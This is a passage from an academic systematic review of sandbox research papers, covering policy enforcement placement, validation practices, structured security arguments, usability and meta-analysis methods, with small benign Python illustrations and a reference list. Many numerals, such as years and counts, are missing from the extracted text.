- how are policies managed? policy management is largely ignored, even where users must write their own policies. (see 'policy flexibility as a usability bellwether')
- how are policies constructed? most policies are hardcoded in the sandbox. (see 'policy flexibility as a usability bellwether')
- what claims are made about sandboxes? applicability to new cases is often the impetus for improving existing techniques, but strong security and better performance are more often claimed. (see 'the state of practice in sandbox validation')
- how are claims validated? benchmarks and case studies are the most favored validation techniques for all types of claims. where security claims are not validated using both benchmarks and case studies, ad hoc arguments are heavily favored. (see 'the state of practice in sandbox validation')
- in what forms are sandboxes made available for review? there is a recent slight increase in the release of sandbox source code, but generally no implementation artifacts are made available for review. (see 'the state of practice in sandbox validation')

sandboxes: building materials for secure systems

sandboxes are flexible security layers ready to improve the security posture of nearly any type of application. while the deployment requirements and details vary from sandbox to sandbox, collectively they can be applied at many different points in a system's architecture and may be introduced at any phase in an application's development lifecycle, starting with the initial implementation. in fact, sandboxes can even be applied well after an application has been abandoned by its maintainer, to secure legacy systems.

in our dataset, the policy enforcement mechanism for a sandbox is always deployed as a system component, as a component of an application host, or by insertion directly into the component that is being encapsulated. while application hosts are becoming more popular as many applications are moved into web browsers and mobile environments, they are currently the least popular place to deploy policy enforcement mechanisms for research sandboxes. our set includes ten sandboxes where policies are enforced in the application host, twenty-six in the component being encapsulated, and thirty-two in a system component (sehr et al. ( ) is counted twice because the enforcement mechanism is spread across the application and its host). we believe that application hosts are less represented because many existing hosts come with a sandbox (e.g., the java sandbox, android's application sandbox, nacl in google chrome, etc.).
indeed, all but one of the sandboxes deployed in application hosts are for the web, where applications can gain substantial benefits from further encapsulation and there is currently no de facto sandbox. the one exception is robusta (siefers, tan & morrisett, ), which enhances the java sandbox to encapsulate additional non-web computations.
figure the citation graph for the papers in our set. the colors represent clusters based on topics of interest (modularity = . ). papers cluster based on topics of interest, not necessarily their technical attributes or validation strategies, thus we must look at lower-level attributes to gain a broad understanding of the sandboxing landscape. papers that were not linked to any of the other papers in the set are not shown. categories bridging mandatory integrity and access control (mi/ac) were collapsed to simply mandatory access control (mac) for this graph. our citation data can be found in supplemental information .
figure breakdown of the representation of all codes for papers that emphasize fixed policies. cases where a claim was made but not validated are labeled with an "x".
system components are heavily represented because any sandbox that is to encapsulate a kernel, driver, or other system component must necessarily enforce the policy in a system component. fifteen of the sandboxes fall into this category because they are encapsulating either a kernel or a hypervisor. the remainder could potentially enforce their policies from a less privileged position, but take advantage of the full access to data and transparency to user-mode applications available to system components. this power is useful when enforcing information flow across applications, when preventing memory corruption, or when otherwise enforcing the same policy on every user-mode application.
figure breakdown of the representation of all codes for papers that emphasize user-defined policies. some sandboxes support a fixed policy with an optional user-defined policy (e.g., siefers, tan & morrisett, ). cases where a claim was made but not validated are labeled with an "x".
research sandboxes almost universally embed their enforcement mechanism in the application that is being encapsulated when the application runs in user mode. application deployment is correlated with fixed policies, where modifying the application itself can lead to higher performance and where it makes sense to ensure the enforcement mechanisms exist anywhere the application is, even if the application moves to a different environment. fixed policies with embedded enforcement mechanisms are correlated with another important deployment concern: statically imposed policies. imposing a policy statically, most often using a special compiler or program re-writer, is advantageous because the policy and its enforcement mechanism can travel with the application, and overhead can be lower as enforcement is tailored to the targeted code.
figure a dendrogram displaying the clusters for sandboxing papers taking into account all categories. at the topmost level, where two clusters exist, the clusters respectively represent sandboxes that use fixed policies and those that use user-defined policies.
there are some cons to this approach. for example, the process of imposing the policy cannot depend on information that is only available at run-time, and the policy is relatively unadaptable after it is set. furthermore, because the policies are less adaptable, sandboxes that statically impose security policies typically only encapsulate components that are targeted by the person applying the sandbox. these are cases where dynamic mechanisms shine. given these trade-offs, it makes sense that papers in our set fall into one of two clusters when all codes are considered: those that are protecting memory and software code, which are relatively easy to encapsulate with a fixed policy, and those managing behaviors manifested in external application communications or interactions with user data and files, which are more easily encapsulated with an adaptable (typically user-defined) policy. generally, hybrid deployments are used when the approach is necessarily dynamic but static pre-processing lowers overhead. sometimes, techniques begin as hybrid approaches and evolve to fully dynamic approaches as they gain traction. for example, early papers that introduce diversity in binaries to make reliable exploits harder to write (e.g., code randomization) tend to rely on compiler-introduced metadata, while later papers do not need the extra help. this evolution broadens the applicability of the sandboxing technique. we observed other techniques such as sfi and cfi evolve by reducing the number of requirements on the application, the person applying the sandbox, or both.
policy flexibility as a usability bellwether
requiring more work out of the user or more specific attributes of an application lowers the odds that a sandbox will be applied, so it is natural that research on specific techniques reduces these burdens over time. we find that the nature of the policy has an influence on how burdensome a sandbox is. about half of the sandboxes with fixed policies require that the application be compiled using a special compiler or use a sandbox-specific framework or library. many fixed-policy sandboxes also require the user to run a tool, often a program re-writer, or to install some sandbox component. in comparison, nearly all sandboxes with flexible policies require the user to write a policy manually, but few have additional requirements for the application. given the burdens involved in manually writing a security policy, the message is clear: easy-to-use sandboxes reduce the user-facing flexibility of the policies they impose. forty-eight sandboxes, more than two-thirds of our sample, use a fixed policy. in all of these cases the policy itself exists within the logic of the sandbox. in the remaining cases, the policy is encoded in the logic of the application twice (e.g., through the use of the sandbox as a framework), and the remaining seventeen cases require the user to manually write a policy.
in cases where the user must manually write the policy, it would help the user if the sandbox supported a mechanism for managing policies: to ensure policies do not have to be duplicated repeatedly for the same application, to generate starter policies for specific cases, to ensure policies can apply to multiple applications, etc. this type of management reduces the burden of having to manually write policies in potentially complex custom policy languages. support for the policy writer is also important because the policies themselves can be a source of vulnerabilities (rosenberg, ). eight out of twenty-six cases where policy management is appropriate offered some central mechanism for storing existing policies, where they could potentially be shared among users. however, none of the papers in our sample list policy management as a contribution, nor do any of the papers attempt to validate any management constructs that are present. it is possible that there are papers outside of our target conferences that explicitly discuss management. for example, programming languages and software engineering conferences are more focused on policy authoring concerns, and management may therefore be the focus of a paper that appears in one of those conferences. however, in spite of the fact that two of the authors of this paper are active researchers in the programming language community and three are active in the software engineering community, we are not aware of any such paper.
the state of practice in sandbox validation
there is little variation in the claims that are made about sandboxes. most claim to either encapsulate a set of threats or to increase the difficulty of writing successful exploits for code-level vulnerabilities. all but four measure the performance overhead introduced by the sandbox. thirty-seven papers, more than half, make claims about the types of components the sandbox applies to, typically because the paper applies an existing technique to a different domain or extends it to additional components.
while there is wide variety in how these claims are validated, we observe measurable patterns. in our data set, proof and analytical analysis were, by far, the least used techniques. the lack of analytical analysis is due to the fact that the technique is primarily useful when the security of the mechanism depends on randomness, which is true of few sandboxes in our set. however, proof appears in two kinds of cases: ( ) papers that prove properties of data flows and ( ) six papers that prove the correctness of a mechanism enforcing a fixed policy. the rarity of proof in the sandboxing domain is not surprising given the difficulty involved. proof is particularly difficult in cases where one would ideally prove that a policy enforcement mechanism is capable of enforcing all possible policies a user can define, which we did not see attempted. instead, claims are often validated empirically or in ways that are ad hoc and qualitative. in empirical evaluations, case studies are the most common technique for all claims, often because proof was not attempted and there is no existing benchmark suite that highlights the novel aspects of the sandbox.
for example, papers for sandboxes with fixed policies often want to show that a particular class of vulnerabilities can no longer be exploited in sandboxed code, thus examples of vulnerable applications and exploits for their vulnerabilities must be gathered or, very rarely, synthesized. when claims were empirically validated, the results were not comparable in fifteen out of sixty-two cases for performance, twenty-two out of forty-two cases for security, and twenty-four out of thirty-one cases for applicability because non-public data was used in the discussed experiments. non-public data takes the form of unlabeled exploits, undisclosed changes to public applications, and unreleased custom example cases (e.g., applications built using a sandbox's framework where the examples were not released). security claims are notoriously difficult to formalize, hence the pervasive lack of proof. many papers instead vet their security claims using multi-faceted strategies, often including both common empirical approaches: case studies and experiments using benchmark suites. however, figs. and illustrate an interesting finding: in twenty-nine papers where multi-faceted strategies are not used, authors pick one empirical tactic and argue that their claims are true. argumentation in this space is problematic because all of the arguments are ad hoc, which makes evaluations that should be comparable difficult to compare at best, but more often incomparable. furthermore, we observed many cases where arguments essentially summarize as, "our sandbox is secure because the design is secure," with details of the design occupying most of the paper in entirely qualitative form. not only are these types of arguments difficult to compare in cases where sandboxes are otherwise quite similar, it is even harder to see if they are complete in the sense that every sub-claim is adequately addressed. our correlational analyses show no significant trends in security or applicability analyses; however, performance validation has improved over time. table summarizes the spearman correlations and their p-values per validation category. spearman correlations fall in the range [−1, 1], where a value of 0 is interpreted as no correlation, positive values show a positive correlation, and negative values a negative correlation. the magnitude of the coefficient grows towards 1 as time and the validation rank become closer to perfect monotonic functions (i.e., when a positive and perfect monotonic relationship exists, the spearman correlation is 1).
figure a dendrogram displaying the clusters for sandboxing papers taking into account validation categories. at the topmost level, where two clusters exist, the clusters respectively represent sandboxes that emphasize multi-faceted empirical security validation and those that do not.
performance validation is positively, and statistically significantly, correlated with the passage of time. we observe that performance validation has advanced from a heavy reliance on benchmark suites to the use of multi-faceted strategies that include benchmark suites and case studies (typically to perform micro-benchmarks) that make use of public data, which ensures the results are comparable with future sandboxes.
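the trend statistics just described can be computed with standard libraries. the following is a minimal sketch on invented data, not the study's dataset or analysis code: it computes a spearman correlation between publication year and a ranked validation score, and fits a small ordinary least squares model of ranked citation counts of the kind discussed next.

```python
# minimal sketch (invented data): spearman correlation of validation rank vs.
# year, and a small least-squares model of ranked citation counts.
import numpy as np
from scipy.stats import spearmanr

# hypothetical per-paper records
years         = np.array([2004, 2006, 2008, 2010, 2012, 2014], dtype=float)
perf_val_rank = np.array([1, 1, 2, 2, 3, 3], dtype=float)   # higher = stronger validation
citation_rank = np.array([6, 5, 4, 3, 2, 1], dtype=float)

rho, p_value = spearmanr(years, perf_val_rank)
print(f"spearman rho = {rho:.2f}, p = {p_value:.4f}")

# ordinary least squares: year + validation rank as predictors of citation rank
X = np.column_stack([np.ones_like(years), years, perf_val_rank])
coef, *_ = np.linalg.lstsq(X, citation_rank, rcond=None)
predicted = X @ coef
r_squared = 1 - np.sum((citation_rank - predicted) ** 2) / np.sum(
    (citation_rank - citation_rank.mean()) ** 2)
print(f"r-squared = {r_squared:.2f}")
```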
table the spearman correlations and their statistical significances per validation category. data with correlation coefficients closer to 1 have stronger correlations.
• security validation: correlation (ρ) − . , p-value .
• performance validation: correlation (ρ) . , p-value .
• applicability validation: correlation (ρ) . , p-value .
while the applicability validation correlation is not statistically significant, we observe that argumentation was abandoned early on in favor of case studies, with some emphasis on including benchmark suites in later years. there is no apparent change in security validation over time. we fit linear models to each validation category separately and together, relative to ranked citation counts, to see if validation practices are predictive of future citations. all of the models achieved an r-squared value of . , which suggests that the passage of time and validation practices jointly explain about half of the variance in citation count ranks. validation practices on their own are not predictive of how highly cited a paper will become. table summarizes the types of claims and the validation strategies employed per type for each paper in our set.
figure breakdown of the representation of validation codes per claim type for the three validation clusters found in our dataset. each row contains the data for one cluster. the bottom two clusters include papers that do not emphasize multi-faceted security validation strategies, instead relying on case studies and arguments that security claims are true. cases where a claim was made but not validated are labeled with an "x".
strengthening sandboxing results
the existing body of knowledge within the sandboxing community provides a strong basis for securing current and future software systems. however, the results in 'results' highlight several gaps. in this section we discuss how structured arguments can solve the problems presented by incomparable and incomplete ad hoc arguments ('structured arguments') and possible ways to enhance sandbox and policy usability ('sandbox and policy usability').
structured arguments
sandboxes are often evaluated against coarse criteria such as the ability to stop exploits against certain classes of vulnerabilities, to encapsulate certain categories of operations, or to function in new environments. however, these coarse criteria typically require the sandbox to address a number of sub-criteria. for example, zhang & sekar ( ) provide cfi without requiring compiler support or a priori metadata, unlike earlier implementations. to ensure the technique is secure, they must be sure that independently transformed program modules maintain cfi when composed. details that clarify how an individual criterion is fulfilled can easily be lost when ad hoc arguments are used in an effort to persuade readers that the criterion has been met, particularly in sandboxes with non-trivial design and implementation details. this can leave the reader unable to compare similar sandboxes or confused about whether or not contributions were validated. since many of the security criteria are repeated across most papers, the cost of developing substructure can be amortized across lots of communal use.
there are many possible ways to structure arguments in support of security claims:
• assurance cases (weinstock, lipson & goodenough, ; kelly, ) provide graphical structures that explicitly tie claims together in trees that show how claims are narrowed. knight ( ) provides a concise introduction to the topic. these structures also explicitly link leaf claims to the evidence that supports the claim. assurance cases were created in response to several fatal accidents resulting from failures to systematically and thoroughly understand safety concerns in physical systems. their use has spread to security and safety critical systems of nearly every variety in recent decades, with case studies from aerospace (graydon, knight & strunk, ) and a sandbox called s (rodes et al., ) that was not analyzed as part of this study (nguyen-tuong et al., ). sandboxing papers can use assurance cases to decompose claims to their most simple components, then link those components to relevant evidence in the paper (e.g., a summary of specific results, a specific section reference, etc.); a toy claim-tree sketch appears after this list.
• maass, scherlis & aldrich ( ) use a qualitative framework to compare sandboxes based on what happens when a sandbox fails, is bypassed, or holds. authors could structure their arguments by using the framework to describe their specific sandbox without performing explicit comparisons.
table claims made about sandboxes ( : security, : performance, and : applicability) and their validation strategies ( : proof, : analytical analysis, : benchmarks, : case studies, and : argumentation). grayed out icons mean a claim was not made or a strategy was not used. icons made by freepik from www.flaticon.com.
category | citation | conference
other (syscall) | provos ( ) | usenix
virtualization | garfinkel et al. ( ) | sosp
diversity | bhatkar, sekar & duvarney ( ) | usenix
other (syscall) | linn et al. ( ) | usenix
cfi | abadi et al. ( ) | ccs
other (memory) | ringenburg & grossman ( ) | ccs
mac | efstathopoulos et al. ( ) | sosp
web | cox et al. ( ) | oakland
sfi | mccamant & morrisett ( ) | usenix
cfi, sfi | erlingsson et al. ( ) | osdi
other (dfi) | castro, costa & harris ( ) | osdi
web | reis et al. ( ) | osdi
other (infoflow) | zeldovich et al. ( ) | osdi
mi/ac | li, mao & chen ( ) | oakland
web | bandhakavi et al. ( ) | ccs
web | chen, ross & wang ( ) | ccs
virtualization | petroni & hicks ( ) | ccs
virtualization | seshadri et al. ( ) | sosp
virtualization | criswell et al. ( ) | sosp
web | wang et al. ( ) | sosp
other (infoflow) | krohn et al. ( ) | sosp
cfi | akritidis et al. ( ) | oakland
virtualization | payne et al. ( ) | oakland
mi/ac | sun et al. ( ) | oakland
other (tainttrack) | chang, streiff & lin ( ) | ccs
web | oda et al. ( ) | ccs
other (os) | williams et al. ( ) | osdi
sfi | yee et al. ( ) | oakland
web | louw & venkatakrishnan ( ) | oakland
web | parno et al. ( ) | oakland
other (memory) | akritidis et al. ( ) | usenix
virtualization | wang et al. ( ) | ccs
sfi | castro et al. ( ) | sosp
virtualization | mccune et al. ( ) | oakland
web | meyerovich & livshits ( ) | oakland
other (memory) | akritidis ( ) | usenix
sfi | sehr et al. ( ) | usenix
web | louw, ganesh & venkatakrishnan ( ) | usenix
other (os) | wurster & van oorschot ( ) | ccs
sfi, other (userpolicy) | siefers, tan & morrisett ( ) | ccs
web | feldman et al. ( ) | osdi
mi/ac | owen et al. ( ) | oakland
other (transactions) | jana, porter & shmatikov ( ) | oakland
cfi | zeng, tan & morrisett ( ) | ccs
web | saxena, molnar & livshits ( ) | ccs
web | chen et al. ( ) | ccs
virtualization | zhang et al. ( ) | sosp
sfi | mao et al. ( ) | sosp
virtualization | andrus et al. ( ) | sosp
diversity | pappas, polychronakis & keromytis ( ) | oakland
diversity | hiser et al. ( ) | oakland
sfi | payer, hartmann & gross ( ) | oakland
cfi | kemerlis, portokalidis & keromytis ( ) | usenix
diversity | giuffrida, kuijsten & tanenbaum ( ) | usenix
mi/ac | xu, saïdi & anderson ( ) | usenix
diversity | wartell et al. ( ) | ccs
web, other (infoflow) | de groef et al. ( ) | ccs
virtualization | dunn et al. ( ) | osdi
web (mi/ac) | giffin et al. ( ) | osdi
cfi | zhang et al. ( ) | oakland
cfi | zhang & sekar ( ) | usenix
cfi, sfi | niu & tan ( ) | ccs
diversity | homescu et al. ( ) | ccs
other (os) | moshchuk, wang & liu ( ) | ccs
virtualization | nikolaev & back ( ) | sosp
cfi | criswell, dautenhahn & adve ( ) | oakland
web | mickens ( ) | oakland
• structured abstracts (hartley, ; haynes et al., ) are used in many medical journals to summarize key results and how those results were produced. these abstracts have the benefit of being quick to read while increasing the retention of information, largely thanks to the use of structure to guide authors in precisely summarizing their work.
• papers could provide a table summarizing their contributions and the important design or implementation details that reflect the contribution.
all of these approaches provide the reader with data missing in ad hoc arguments: a specific map from the claims made about a sandbox to evidence that justifies the claim has been met. they are also necessarily qualitative, but as we saw earlier, arguments are often used where more rigorous approaches are currently intractable. we believe that adding structure to these arguments is a reasonable advancement of the state of practice in sandbox validation.
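to make the assurance-case suggestion above concrete, here is a toy sketch of the kind of claim tree such a case makes explicit. the claim text, evidence labels, and structure are invented for illustration (loosely echoing the cfi composition example mentioned earlier) and are not drawn from any paper in the set.

```python
# toy sketch (invented content): an assurance-case-style claim tree that
# narrows a top-level security claim into sub-claims tied to evidence.
from dataclasses import dataclass, field
from typing import List


@dataclass
class Claim:
    statement: str
    evidence: List[str] = field(default_factory=list)   # e.g., section refs, results
    sub_claims: List["Claim"] = field(default_factory=list)


example_case = Claim(
    "transformed modules preserve cfi when composed",
    sub_claims=[
        Claim("each module's indirect branches are checked",
              evidence=["design description, enforcement section"]),
        Claim("checks are preserved across module boundaries",
              evidence=["composition experiment", "benchmark results table"]),
    ],
)


def unsupported(claim: Claim) -> List[str]:
    """return leaf claims that cite no evidence, i.e., gaps in the argument."""
    if not claim.sub_claims:
        return [] if claim.evidence else [claim.statement]
    gaps: List[str] = []
    for sub in claim.sub_claims:
        gaps.extend(unsupported(sub))
    return gaps


print(unsupported(example_case))   # [] when every leaf is backed by evidence
```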
we observe that a focus on performance evaluation is partially motivated by the fact that overhead is relatively easy to quantify, but we also saw many cases where researchers were explicitly concerned with whether or not a sandbox was too resource intensive for adoption. the latter is a reasonable concern; szekeres et al. ( ) pointed out that many mitigations for memory corruption vulnerabilities are not adopted because performance concerns outweigh protection merits. while the idea that performance is an important adoption concern is compelling and likely reflects reality, we cannot correlate performance with the adoption of the sandboxes in our set. we cannot find a correlation because the sandboxes and their techniques in our set remain almost entirely unadopted. we only found four cases where sandboxes in our set were either directly adopted or where the techniques they evaluate are clearly implemented in a different but adopted sandbox. a lack of adoption is present even for techniques where performance and applicability have been improved over multiple decades (e.g., sfi). three of the adopted sandboxes were created by the industry itself or by entities very closely tied to it: google nacl was designed with the intention of adopting it in google chrome in the short term (yee et al., ; sehr et al., ) and the paper on systrace was published with functioning open source implementations for most unix-like operating systems (provos, ). while the case for adoption is weaker, cells (andrus et al., ) is a more advanced design than one vmware developed in parallel (berlind, ), although the sandboxes both aim to partition phones into isolated compartments using virtualization (e.g., one for work and one for personal use). more recently, microsoft has stated that visual studio will ship with an exploit mitigation that we believe is equivalent to what the research community calls cfi (hogg, ). a third party analysis supports this belief, however the uncovered implementation details differ from the techniques implemented in published research (tang, ). we argue that the need to evaluate the usability of our sandboxes is evidenced by the observation that performance and security evaluation are not sufficient to drive adoption. usability is of particular concern in cases where the sandbox requires developers without maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. security expertise ( ) to re-architect applications to apply the sandbox and/or ( ) to develop a security policy. in practice, it is quite common for developers without a security focus to apply sandboxes, particularly java’s. in fact, usability issues have factored into widely publicized vulnerabilities in how sandboxes were applied to google chrome and adobe reader as well as the many vulnerable applications of the java sandbox (coker et al., ). in all of these cases applying the sandbox is a relatively manual process where it is difficult for the applier to be sure he is fully imposing the desired policy and without missing relevant attack surfaces. these usability issues have caused vulnerabilities that have been widely exploited to bypass the sandboxes. we call on the community to evaluate the following usability aspects of their sandboxes where appropriate: • the intended users are capable of writing policies for the component(s) to be sandboxed that are neither over- or under-privileged. 
• policy enforcement mechanisms can be applied without missing attack surfaces that compromise the sandbox in the targeted component(s).
• source code transformations (e.g., code re-writing or annotations) do not substantially burden future development or maintenance.
• the sandbox, when applied to a component, does not substantially alter a typical user's interactions with the sandboxed component.
ideally many of these points would be evaluated during user studies with actual stakeholders. however, we believe that we can make progress on all of these points without the overhead of a full user study, particularly because we are starting from a state where no usability evaluations are performed. for example, authors can describe correct ways to determine what privileges in their policy language a component needs, or even provide tools to generate policies to mitigate the risks presented by under- and over-privileged policies. similarly, tooling can be provided to help users install policy enforcement mechanisms or check that manual applications of a mechanism are correct. sandbox developers can transform or annotate representative open source applications and use repository mining (http://msrconf.org) to determine how sandbox alterations are affected by code evolution present in the repository (kagdi, collard & maletic, ; yan, menarini & griswold, ; mauczka et al., ; stuckman & purtilo, ). finally, a summary of how the sandbox qualitatively changes a user's experience with a sandboxed component would provide a gauge for how much the sandbox burdens end-users.
enabling meta-analysis
we believe a key contribution of this work is the use of multi-disciplinary and systematic methodologies for drawing conclusions about a large body of security techniques. in this section, we discuss the generalizability of our methodology and suggest other areas to which it can be applied. then, we discuss some challenges that we faced when doing this research and suggest changes that would address these challenges.
generalizability of methodology
the methodology employed in this paper is based on two research approaches: qualitative content analysis and systematic literature reviews. qualitative content analysis is primarily used in the humanities and social sciences. systematic literature reviews were first applied to medical studies and are used primarily in empirical fields. the differences between sandboxing papers are bigger than the differences between studies of a particular cancer treatment. in addition, sandboxing papers do not fit into the "native" domains of either approach: their primary contributions are designs, techniques, and implementations. the result of these differences is that most literature reviews and systemizations in computing are done in an ad hoc manner. our computing research is worthy of a more rigorous approach, and we think the methodology applied in this paper can and should be applied to other topics.
in fact, any topic of active research where the primary contribution is an engineered artifact, but without a clear and precise definition, would be amenable to our approach. these topics span computing research from software engineering (e.g., service oriented architecture, concurrent computation models) to systems (e.g., green computing, no instruction set computing) to human–computer interaction (e.g., gui toolkits, warning science).
meta-analysis challenges and suggested solutions
in our experience, the biggest roadblock standing in the way of applying the same techniques to other segments of the research community lies in the difficulty involved in collecting analyzable metadata about papers. we experienced several fixable issues:
• the major publishers in computer science (ieee, acm, and usenix) do not provide publicly available mechanisms to collect metadata and either rate limit or outright ban scraping (in at least one case acm provided a copy of their digital library for scraping (bergmark, phempoonpanich & zhao, )). in our case, the painstaking process of collecting and curating analyzable metadata across several sources limited our ability to explore hypotheses about our dataset's papers and their relationships to publications not in the set.
• the metadata is limited and contains little semantic content; typically the metadata includes the authors, title, date, and doi, but little else. if abstracts and keywords were easier to harvest we could have more systematically derived topics of interest within the sandboxing community.
• links to papers on publisher websites use internal identifiers (e.g., http://dl.acm.org/citation.cfm?id= ) instead of doi. this makes it difficult to reference papers across publisher repositories; a doi-based metadata lookup is sketched after this list.
• conference websites have inconsistent layouts, which increases the difficulty of data collection.
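one route that does exist today for doi-keyed metadata is the public crossref rest api. the sketch below is a minimal, hypothetical example of such a lookup, not tooling from this paper, and the doi shown is a placeholder; it illustrates the kind of record (title, authors, date, reference counts) that would make cross-repository analysis easier.

```python
# minimal sketch (hypothetical usage): fetch doi-keyed metadata from the
# public crossref rest api so papers can be referenced across repositories.
import requests


def fetch_metadata(doi: str) -> dict:
    resp = requests.get(f"https://api.crossref.org/works/{doi}", timeout=30)
    resp.raise_for_status()
    msg = resp.json()["message"]
    return {
        "title": (msg.get("title") or [""])[0],
        "authors": [f"{a.get('given', '')} {a.get('family', '')}".strip()
                    for a in msg.get("author", [])],
        "year": (msg.get("issued", {}).get("date-parts") or [[None]])[0][0],
        # reference lists are present only when the publisher deposits them
        "reference_count": msg.get("reference-count", 0),
    }


# placeholder doi, for illustration only
# print(fetch_metadata("10.1234/example-doi"))
```

abstracts and keywords are deposited far less consistently, which is consistent with the harvesting difficulty noted above.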
we believe easier access to this data would have allowed us to draw more conclusions about how sandboxing papers are related and how the sandboxing landscape has evolved over time. for example, we explored the idea of using a more developed citation graph than fig. to trace the lineage of sandboxing techniques, but found the required resource expenditures were outside of our means. this data may provide support for explanations regarding the lack of advancement in security validation practices (e.g., by showing an emphasis on a different but important dimension of advancement). these points are important to understand how we got to the current state of practice, thus improving our ability to recognize and advance means for enhancing our results.
on another data collection point, we averaged about min per paper to code the data necessary to answer our research questions. while we do not claim that our research questions are of universal interest to the sandboxing community, we did observe that papers that answer all or most of the questions in the abstract are often clearly written throughout and easy to interpret. a small minority of sandboxing papers have far less specific abstracts. in these cases, the papers often took double the average time to comprehend and interpret. it may be useful to strive to clearly answer questions like ours in future papers to show practitioners the value sandbox researchers bring to the table.
threats to validity
due to the complexity of the text and concepts we are interpreting, there is some risk that other coders would assign quotes to different codes. different codes will change the results, but we believe this risk is mitigated through our tests of the coding frame and by our efforts to select clear quotes. furthermore, the correlative nature of our results ensures that a few code divergences will not dramatically change the analysis's outcomes. the primary risk is that we are missing relevant quotes that add codes to our dataset. this is typically mitigated in qca by fully segmenting the text, but we decided against that strategy because of the very large data set we studied and the irrelevance of most of the text to our goals.
we did search pdfs for relevant keywords we observed were commonly linked to specific codes throughout the process (e.g., "proof", "available" to find the availability of sandbox artifacts for evaluation, "experiment" to signal a case study or benchmark, etc.) to decrease the odds of missing a code. while this does mitigate the risk, it is still likely that our results under-approximate the state of the sandboxing landscape.
conclusion
we systematically analyzed the sandboxing landscape as it is represented by five top-tier security and systems conferences. our analysis followed a multidisciplinary strategy that allowed us to draw conclusions backed by rigorous interpretations of qualitative data, statistics, and graph analysis. based on our results, we conclude that the sandbox research community will benefit from the use of structured arguments in support of security claims and from the validation of sandbox and policy usability. we suggested lightweight ways to move forward in achieving these goals. our data also shows that there is a dearth of science regarding the management of security policies for sandboxes, although we did not discuss this gap in depth.
additional information and declarations
funding
this material is based upon work supported by the us department of defense through the office of the assistant secretary of defense for research and engineering (asd(r&e)) under contract hq - -d- and the national security agency under lablet contract h - -c- . any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of asd(r&e) or nsa. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors: us department of defense: hq - -d- . national security agency: h - -c- .
competing interests
the authors declare there are no competing interests.
author contributions
• michael maass conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• adam sales analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, reviewed drafts of the paper.
• benjamin chung analyzed the data, performed the computation work, reviewed drafts of the paper.
• joshua sunshine conceived and designed the experiments, performed the experiments, wrote the paper, reviewed drafts of the paper.
data availability
the following information was supplied regarding data availability: we have supplied all our data in the supplemental dataset files.
supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
references
abadi m, budiu m, erlingsson ú, ligatti j. . control-flow integrity principles, implementations, and applications. in: proceedings of the th acm conference on computer and communications security (ccs ' ). new york: acm, – .
akritidis p. . cling: a memory allocator to mitigate dangling pointers. in: usenix security (usenix security' ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . .
akritidis p, cadar c, raiciu c, costa m, castro m. . preventing memory error exploits with wit. in: ieee symposium on security and privacy (sp ' ). washington, d.c.: ieee computer society, – .
akritidis p, costa m, castro m, hand s. . baggy bounds checking: an efficient and backwards-compatible defense against out-of-bounds errors. in: usenix security (ssym' ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . .
al ameiri f, salah k. . evaluation of popular application sandboxing. in: international conference for internet technology and secured transactions (icitst), . washington, d.c.: ieee, – .
andrus j, dall c, van't hof a, laadan o, nieh j. . cells: a virtual mobile smartphone architecture. in: acm symposium on operating systems principles (sosp) (sosp ' ). new york: acm, – .
bandhakavi s, bisht p, madhusudan p, venkatakrishnan vn. .
candid: preventing sql injection attacks using dynamic candidate evaluations. in: acm conference on computer and communications security (ccs) (ccs ' ). new york: acm, – .
barnes jm. . software architecture evolution. phd dissertation, carnegie mellon university.
berelson b. . content analysis in communication research. glencoe: free press.
bergmark d, phempoonpanich p, zhao s. . scraping the acm digital library. in: sigir forum. . – .
berlind d. . vmware shows android based virtual machines. available at http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? (accessed april ).
bhatkar s, sekar r, duvarney dc. . efficient techniques for comprehensive protection from memory error exploits. in: usenix security (ssym' ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . .
budgen d, brereton p. . performing systematic literature reviews in software engineering. in: international conference on software engineering (icse ' ). new york: acm, – .
cappos j, dadgar a, rasley j, samuel j, beschastnikh i, barsan c, krishnamurthy a, anderson t. . retaining sandbox containment despite bugs in privileged memory-safe code. in: acm conference on computer and communications security (ccs) (ccs ' ). new york: acm, – .
castro m, costa m, harris t. . securing software by enforcing data-flow integrity. in: usenix symposium on operating systems design and implementation (osdi) (osdi ' ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . .
castro m, costa m, martin j-p, peinado m, akritidis p, donnelly a, barham p, black r. . fast byte-granularity software fault isolation. in: acm symposium on operating systems principles (sosp) (sosp ' ). new york: acm, – .
chandra r, kim t, shah m, narula n, zeldovich n. . intrusion recovery for database-backed web applications. in: acm symposium on operating systems principles (sosp) (sosp ' ). new york: acm, – .
